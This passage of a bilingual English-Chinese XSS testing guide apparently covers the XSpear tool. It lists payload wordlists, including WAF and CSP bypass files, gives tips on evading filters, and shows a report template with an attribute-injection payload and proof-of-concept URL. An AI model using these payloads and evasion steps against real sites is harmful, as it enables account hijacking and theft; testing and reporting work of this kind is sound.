    - XSpear完整指南
  • references/xss_payload_techniques.md
    - XSS payload技术
  • references/dom_xss_guide.md
    - DOM型XSS测试指南
  • references/csp_bypass_guide.md
    - CSP绕过技术
  • references/framework_xss_guide.md
    - 框架特定XSS指南
  • references/svg_xss_guide.md
    - SVG XSS测试指南
  • references/mutation_xss_guide.md
    - 变异型XSS/DOM覆盖指南
  • references/websocket_xss_guide.md
    - WebSocket XSS测试指南

Assets/Wordlists

资产/词表

  • assets/common_xss_payloads.txt
    - Basic XSS payloads
  • assets/attribute_xss_payloads.txt
    - Attribute context payloads
  • assets/dom_xss_payloads.txt
    - DOM XSS payloads
  • assets/blind_xss_payloads.txt
    - Blind XSS with callbacks
  • assets/polyglot_xss_payloads.txt
    - Multi-context payloads
  • assets/waf_bypass_payloads.txt
    - WAF evasion payloads
  • assets/csp_bypass_payloads.txt
    - CSP bypass payloads
  • assets/framework_xss_payloads.txt
    - Angular/React/Vue payloads
  • assets/svg_xss_payloads.txt
    - SVG XSS payloads
  • assets/mutation_xss_payloads.txt
    - Mutation XSS payloads
  • assets/websocket_xss_payloads.txt
    - WebSocket XSS payloads
  • assets/common_xss_payloads.txt
    - 基础XSS payload
  • assets/attribute_xss_payloads.txt
    - 属性上下文payload
  • assets/dom_xss_payloads.txt
    - DOM型XSS payload
  • assets/blind_xss_payloads.txt
    - 带回调的盲XSS payload
  • assets/polyglot_xss_payloads.txt
    - 多上下文payload
  • assets/waf_bypass_payloads.txt
    - WAF规避payload
  • assets/csp_bypass_payloads.txt
    - CSP绕过payload
  • assets/framework_xss_payloads.txt
    - Angular/React/Vue payload
  • assets/svg_xss_payloads.txt
    - SVG XSS payload
  • assets/mutation_xss_payloads.txt
    - 变异型XSS payload
  • assets/websocket_xss_payloads.txt
    - WebSocket XSS payload

External Resources

外部资源

Common Responses & Troubleshooting

常见响应与故障排除

"No XSS found"

"未发现XSS"

  • Try different payload encodings
  • Test with DOM scanner enabled
  • Check if there's a WAF blocking
  • Test with blind XSS payloads
  • Verify the parameter actually reflects
  • 尝试不同的payload编码
  • 启用DOM扫描器进行测试
  • 检查是否有WAF拦截
  • 测试盲XSS payload
  • 验证参数是否真的会反射

"Payload is reflected but not executing"

"Payload被反射但未执行"

  • Analyze the context using context analyzer
  • Use context-specific payloads
  • Check for CSP (Content Security Policy)
  • Check for input sanitization
  • Try alternative tags/event handlers
  • 使用上下文分析器分析上下文
  • 使用特定上下文的payload
  • 检查是否存在CSP(内容安全策略)
  • 检查是否有输入 sanitization(净化)
  • 尝试替代标签/事件处理器

"403 / WAF blocked"

"403 / WAF拦截"

  • Use WAF bypass payloads
  • Try different encoding methods
  • Use XSpear with --bypass flag
  • Test with smaller payloads first
  • Try alternative injection points
  • 使用WAF绕过payload
  • 尝试不同的编码方式
  • 使用XSpear的--bypass标志
  • 先测试较小的payload
  • 尝试替代注入点

Reporting Format

报告格式

When reporting XSS vulnerabilities, include:
╔═══════════════════════════════════════════════════════╗
║              XSS Vulnerability Report                 ║
╠═══════════════════════════════════════════════════════╣
║ Target: https://target.com/search                     ║
║ Type: Reflected XSS                                   ║
║ Severity: High                                        ║
╚═══════════════════════════════════════════════════════╝

Vulnerable Parameter: q
Injection Context: HTML attribute (value)
Payload: " onmouseover=alert('XSS')

Proof of Concept:
https://target.com/search?q=%22%20onmouseover%3Dalert('XSS')

Impact:
- Execute arbitrary JavaScript in victim's browser
- Steal session cookies
- Perform actions on behalf of victim
- Deface website

Recommendations:
- Implement proper output encoding
- Use Content Security Policy (CSP)
- Validate and sanitize all input
- Use framework-provided escaping functions
报告XSS漏洞时,请包含以下内容:
╔═══════════════════════════════════════════════════════╗
║              XSS漏洞报告                              ║
╠═══════════════════════════════════════════════════════╣
║ 目标:https://target.com/search                     ║
║ 类型:反射型XSS                                   ║
║ 严重级别:高                                        ║
╚═══════════════════════════════════════════════════════╝

存在漏洞的参数:q
注入上下文:HTML属性(值)
Payload:" onmouseover=alert('XSS')

概念验证:
https://target.com/search?q=%22%20onmouseover%3Dalert('XSS')

影响:
- 在受害者浏览器中执行任意JavaScript
- 窃取会话Cookie
- 代表受害者执行操作
- 篡改网站内容

建议:
- 实现适当的输出编码
- 使用内容安全策略(CSP)
- 验证并净化所有输入
- 使用框架提供的转义函数